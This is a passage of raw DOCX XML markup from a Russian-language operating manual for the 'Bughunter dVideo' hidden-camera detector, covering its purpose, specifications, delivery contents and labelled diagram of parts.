    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>Назначение изделия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6975">
        <w:t>1.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">Изделие является портативным прибором, предназначенным для поиска скрытых </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(закамуфлированных в различных предметах интерьера)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> видеокамер независимо от того, находятся ли они во включенном или в выключенном состоянии. Изделие позволяет обнаружить не только проводные видеокамеры, но и работающие по радиоканалу </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(беспроводные)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>, которые, используя собственный радиопередатчик, способны отправлять информацию на десятки или сотни метров</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve"> Условия эксплуатации изделия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">- температура окружающего воздуха, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>С   от – 40 до + 55;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- относительная влажность воздуха при 25</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>С, % до 98;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>- атмосферное давление от 66,6 кПа до 106,6 кПа  (от 500 мм рт.ст. до 800 мм рт.ст.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2  Технические характеристики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2.1 Внешний вид изделия представлен на рисунке 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3726180" cy="2956560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Рисунок 8" descr="Описание: Test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st06"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="12733" t="9975" r="14046" b="12720"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3726180" cy="2956560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Рисунок 1 – внешний вид изделия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2.2  Габаритные размеры изделия, мм, не более  92 х 58 х 24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2.3  Масса изделия с элементами питания, кг, не более 0,09</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2.4  Питание  от встроенных аккумуляторов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">1.2.5 Возможность работы от внешнего источника питания 5 В  </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(поставляется в комплекте).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2.6 Максимальный ток, потребляемый изделием, мА, не более 350</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t xml:space="preserve">1.2.7 Время работы от аккумуляторных батарей </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(без подзарядки)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>, ч, не менее 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2.8  Максимальная дальность обнаружения видеокамер, до 18м.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.2.9 Время зарядки аккумуляторных батарей, не более  8ч.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.3  Состав изделия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.3.1 Состав изделия и комплект поставки приведены в таблице 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>Таблица 1</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1E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="6765"/>
        <w:gridCol w:w="1237"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153"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  п/п</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6851"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Наименование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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Колич.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6851"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Детектор скрытых видеокамер  «</w:t>
            </w:r>
            <w:r w:rsidRPr="007C6975">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Bughunter</w:t>
            </w:r>
            <w:r w:rsidRPr="007C6975">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007C6975">
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TM</w:t>
            </w:r>
            <w:r w:rsidRPr="007C6975">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007C6975">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dVideo</w:t>
            </w:r>
            <w:r w:rsidRPr="007C6975">
              <w:t>» ИНТК.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6851"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 xml:space="preserve">Внешний источник питания </w:t>
            </w:r>
            <w:r w:rsidRPr="007C6975">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>(сетевой адаптер)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6851"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Индивидуальная упаковка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6851"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Руководство по эксплуатации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00BB40F5" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="007C6975">
        <w:t>1.3.2 Расположение основных частей изделия представлено на рисунке 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251652608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>308610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>64135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5659755" cy="4876800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21516"/>
                <wp:lineTo x="21520" y="21516"/>
                <wp:lineTo x="21520" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="20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9755"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7C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251627008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3431540</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>71755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="656590" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="20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31140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:r>
                              <w:t>Экран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4" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:270.2pt;margin-top:5.65pt;width:51.7pt;height:18.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" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:r>
                        <w:t>Экран</w:t>
                      </w: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1796415</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4204970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3223260" cy="242570"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:wrapNone/>
                <wp:docPr id="20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425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45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:r>
                              <w:t>Дополнительные светодиоды подсветки ближней зоны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3" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:141.45pt;margin-top:331.1pt;width:253.8pt;height:19.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" filled="f" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:r>
                        <w:t>Дополнительные светодиоды подсветки ближней зоны</w:t>
                      </w:r>
                    </w:p>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3772535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3713480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2554605" cy="464820"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="20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4648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45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:r>
                              <w:t>Гнездо для подключения внешнего источника питания/зарядного устройства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2" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:297.05pt;margin-top:292.4pt;width:201.15pt;height:36.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" filled="f" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:r>
                        <w:t>Гнездо для подключения внешнего источника питания/зарядного устройства</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>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4474210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2949575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2393315" cy="946785"/>
                <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
                <wp:wrapNone/>
                <wp:docPr id="20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9467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45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:r>
                              <w:t>Кнопка включения/выключения, переключения режимов работы, отображения уровня заряда аккумуляторов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1" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:352.3pt;margin-top:232.25pt;width:188.45pt;height:74.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" filled="f" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:r>
                        <w:t>Кнопка включения/выключения, переключения режимов работы, отображения уровня заряда аккумуляторов</w:t>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1261110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>563880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1489710" cy="290195"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="20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2901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45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:r>
                              <w:t>Светодиоды излучателя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 o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:99.3pt;margin-top:44.4pt;width:117.3pt;height:22.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" filled="f" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:r>
                        <w:t>Светодиоды излучателя</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2694305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>564515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="869950" cy="290195"/>
                <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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2901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45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:r>
                              <w:t>Объектив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 o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:212.15pt;margin-top:44.45pt;width:68.5pt;height:22.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" filled="f" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:r>
                        <w:t>Объектив</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1243330</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>154940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2188210" cy="290195"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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2901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45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:r>
                              <w:t>Индикаторы режимов работы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8" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:97.9pt;margin-top:12.2pt;width:172.3pt;height:22.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" filled="f" strokecolor="white">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:r>
                        <w:t>Индикаторы режимов работы</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="4294967294" distB="4294967294" distL="114300" distR="114300" simplePos="0" relativeHeight="251634176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1352550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>365124</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1662430" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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624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6F9EDE" id="Прямая соединительная линия 27" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:251634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6.5pt,28.75pt" to="237.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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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3044190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3412490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="680085" cy="680085"/>
                <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
                <wp:wrapNone/>
                <wp:docPr id="19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085" cy="6800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9D8170" id="Прямая соединительная линия 2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7pt,268.7pt" to="293.25pt,3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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="4294967294" distB="4294967294" distL="114300" distR="114300" simplePos="0" relativeHeight="251636224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3724275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4124324</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2437765" cy="0"/>
                <wp:effectExtent l="0" t="0" r="635" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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77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EAA490" id="Прямая соединительная линия 25" o:spid="_x0000_s1026" style="position:absolute;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93.25pt,324.75pt" to="485.2pt,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3723640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2313940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="656590" cy="1733550"/>
                <wp:effectExtent l="0" t="0" r="10160" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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6590" cy="1733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1E0350" id="Прямая соединительная линия 24"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pt,182.2pt" to="344.9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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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4337050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1579245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="611505" cy="1828800"/>
                <wp:effectExtent l="0" t="0" r="17145" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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 cy="1828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442823" id="Прямая соединительная линия 23"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124.35pt" to="389.65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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="4294967294" distB="4294967294" distL="114300" distR="114300" simplePos="0" relativeHeight="251639296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4337050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3484879</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2269490" cy="0"/>
                <wp:effectExtent l="0" t="0" r="16510" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="19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94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FB7E0F" id="Прямая соединительная линия 22" o:spid="_x0000_s1026" style="position:absolute;z-index:25163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1.5pt,274.4pt" to="520.2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">
                <o:lock v:ext="edit" shapetype="f"/>
              </v:lin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2175510</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>765175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="613410" cy="1061720"/>
                <wp:effectExtent l="0" t="0" r="15240" b="5080"/>
                <wp:wrapNone/>
                <wp:docPr id="19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 cy="1061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66365E" id="Прямая соединительная линия 21"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3pt,60.25pt" to="219.6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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
